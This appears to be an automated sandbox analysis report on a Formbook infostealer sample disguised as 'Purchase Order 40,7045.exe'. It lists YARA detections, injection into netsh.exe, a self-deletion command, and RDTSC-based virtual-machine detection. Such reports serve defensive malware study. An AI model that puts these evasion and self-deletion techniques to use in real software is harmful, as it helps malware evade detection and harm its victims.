Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_0087BBF0	0_2_0087BBF0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00876BF0	0_2_00876BF0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_0087DCD9	0_2_0087DCD9
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00875C03	0_2_00875C03
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00876436	0_2_00876436
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_0087B69F	0_2_0087B69F
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_0087CFA1	0_2_0087CFA1
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_0086A7E0	0_2_0086A7E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00401030	1_2_00401030
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0041C16E	1_2_0041C16E
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00408A40	1_2_00408A40
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00408A3B	1_2_00408A3B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0041C52F	1_2_0041C52F
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00402D8A	1_2_00402D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00402D90	1_2_00402D90
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0041BF03	1_2_0041BF03
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00402FB0	1_2_00402FB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01214120	1_2_01214120
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FF900	1_2_011FF900
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF	1_2_012199BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012CE824	1_2_012CE824
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A830	1_2_0121A830
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1002	1_2_012B1002
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012220A0	1_2_012220A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C20A8	1_2_012C20A8
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120B090	1_2_0120B090
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C28EC	1_2_012C28EC
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C2B28	1_2_012C2B28
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309	1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121AB40	1_2_0121AB40
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122EBB0	1_2_0122EBB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012A23E3	1_2_012A23E3
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B03DA	1_2_012B03DA
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BDBD2	1_2_012BDBD2
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122ABD8	1_2_0122ABD8
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012AFA2B	1_2_012AFA2B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C22AE	1_2_012C22AE
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF	1_2_012B4AEF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C2D07	1_2_012C2D07
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F0D20	1_2_011F0D20
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C1D55	1_2_012C1D55
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01222581	1_2_01222581
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B2D82	1_2_012B2D82
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120D5E0	1_2_0120D5E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C25DD	1_2_012C25DD
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120841F	1_2_0120841F
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BD466	1_2_012BD466
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496	1_2_012B4496
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C1FF1	1_2_012C1FF1
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012CDFCE	1_2_012CDFCE
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01216E30	1_2_01216E30
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BD616	1_2_012BD616
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C2EF7	1_2_012C2EF7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0394EBB0	3_2_0394EBB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D03DA	3_2_039D03DA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0394ABD8	3_2_0394ABD8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039DDBD2	3_2_039DDBD2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039C23E3	3_2_039C23E3
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E2B28	3_2_039E2B28
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393AB40	3_2_0393AB40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E22AE	3_2_039E22AE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF	3_2_039D4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039CFA2B	3_2_039CFA2B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039399BF	3_2_039399BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0391F900	3_2_0391F900
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03934120	3_2_03934120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0392B090	3_2_0392B090
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039420A0	3_2_039420A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E20A8	3_2_039E20A8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E28EC	3_2_039E28EC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D1002	3_2_039D1002
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A830	3_2_0393A830
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039EE824	3_2_039EE824
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039EDFCE	3_2_039EDFCE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E1FF1	3_2_039E1FF1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E2EF7	3_2_039E2EF7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039DD616	3_2_039DD616
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03936E30	3_2_03936E30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03942581	3_2_03942581
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E25DD	3_2_039E25DD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0392D5E0	3_2_0392D5E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E2D07	3_2_039E2D07
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03910D20	3_2_03910D20
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E1D55	3_2_039E1D55
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4496	3_2_039D4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0392841F	3_2_0392841F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039DD466	3_2_039DD466
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DD8A40	3_2_02DD8A40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DD8A3B	3_2_02DD8A3B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DEC16E	3_2_02DEC16E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DD2FB0	3_2_02DD2FB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DEBF03	3_2_02DEBF03
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DD2D90	3_2_02DD2D90
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DD2D8A	3_2_02DD2D8A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DEC52F	3_2_02DEC52F

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: String function: 00871820 appears 38 times
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: String function: 011FB150 appears 133 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 0391B150 appears 124 times

Source: Purchase Order 40,7045.exe, 00000000.00000003.234862655.00000000023D6000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045.exe
Source: Purchase Order 40,7045.exe, 00000001.00000002.269100880.00000000012EF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045.exe
Source: Purchase Order 40,7045.exe, 00000001.00000002.268943802.00000000011AC000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamenetsh.exej% vs Purchase Order 40,7045.exe

Source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Purchase Order 40,7045.exe.9a0000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Purchase Order 40,7045.exe.9a0000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Purchase Order 40,7045.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Purchase Order 40,7045.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/0@16/13

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_01

Source: Purchase Order 40,7045.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Purchase Order 40,7045.exe	Virustotal: Detection: 40%
Source: Purchase Order 40,7045.exe	ReversingLabs: Detection: 33%

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

File read: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Purchase Order 40,7045.exe 'C:\Users\user\Desktop\Purchase Order 40,7045.exe'
Source: unknown	Process created: C:\Users\user\Desktop\Purchase Order 40,7045.exe C:\Users\user\Desktop\Purchase Order 40,7045.exe
Source: unknown	Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Process created: C:\Users\user\Desktop\Purchase Order 40,7045.exe C:\Users\user\Desktop\Purchase Order 40,7045.exe	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045.exe'	Jump to behavior

Source: Purchase Order 40,7045.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: netsh.pdb source: Purchase Order 40,7045.exe, 00000001.00000002.268930422.0000000001190000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Purchase Order 40,7045.exe, 00000000.00000003.233625901.0000000002450000.00000004.00000001.sdmp, Purchase Order 40,7045.exe, 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, netsh.exe, 00000003.00000002.499126985.00000000038F0000.00000040.00000001.sdmp
Source:	Binary string: netsh.pdbGCTL source: Purchase Order 40,7045.exe, 00000001.00000002.268930422.0000000001190000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Purchase Order 40,7045.exe, netsh.exe

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Code function: 0_2_00879B2F LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00879B2F

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00871865 push ecx; ret	0_2_00871878
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_008864B9 push eax; ret	0_2_008864E9
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00886538 push eax; ret	0_2_008864E9
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_0086BF4F push ecx; ret	0_2_0086BF62
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00415913 push edx; retf	1_2_00415915
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0041AC62 push D8D19732h; iretd	1_2_0041AC69
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00414D57 push esi; retf	1_2_00414D58
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0041AD65 push eax; ret	1_2_0041ADB8
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00414DEA push eax; ret	1_2_00414E32
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0041ADB2 push eax; ret	1_2_0041ADB8
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0041ADBB push eax; ret	1_2_0041AE22
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00414E7E push eax; ret	1_2_00414E32
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0041AE1C push eax; ret	1_2_0041AE22
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00414E24 push eax; ret	1_2_00414E32
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0040FF92 push 00000033h; iretd	1_2_0040FF98
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0124D0D1 push ecx; ret	1_2_0124D0E4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0396D0D1 push ecx; ret	3_2_0396D0E4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DE5913 push edx; retf	3_2_02DE5915
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DE4E7E push eax; ret	3_2_02DE4E32
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DEAE1C push eax; ret	3_2_02DEAE22
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DE4E24 push eax; ret	3_2_02DE4E32
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DDFF92 push 00000033h; iretd	3_2_02DDFF98
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DEAC62 push D8D19732h; iretd	3_2_02DEAC69
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DE4DEA push eax; ret	3_2_02DE4E32
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DEADBB push eax; ret	3_2_02DEAE22
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DEADB2 push eax; ret	3_2_02DEADB8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DE4D57 push esi; retf	3_2_02DE4D58
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DEAD65 push eax; ret	3_2_02DEADB8

Source: C:\Windows\SysWOW64\netsh.exe

Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	RDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	RDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 0000000002DD83D4 second address: 0000000002DD83DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 0000000002DD876E second address: 0000000002DD8774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Code function: 1_2_004086A0 rdtsc

1_2_004086A0

Source: C:\Windows\explorer.exe TID: 5720	Thread sleep time: -70000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 6852	Thread sleep time: -50000s >= -30000s			Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe	Last function: Thread delayed

Source: explorer.exe, 00000002.00000000.250239120.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.250239120.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000002.00000000.249688843.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000000.250034592.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.250316069.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000000.252788264.000000000F640000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&r
Source: explorer.exe, 00000002.00000002.506854506.0000000004E61000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000002.00000000.250239120.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000002.00000000.250239120.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000002.00000000.250316069.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000002.00000002.508086144.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000002.00000000.249688843.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.249688843.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.252834409.000000000F685000.00000004.00000001.sdmp	Binary or memory string: lume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAq
Source: explorer.exe, 00000002.00000000.249688843.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Process information queried: ProcessInformation

Jump to behavior

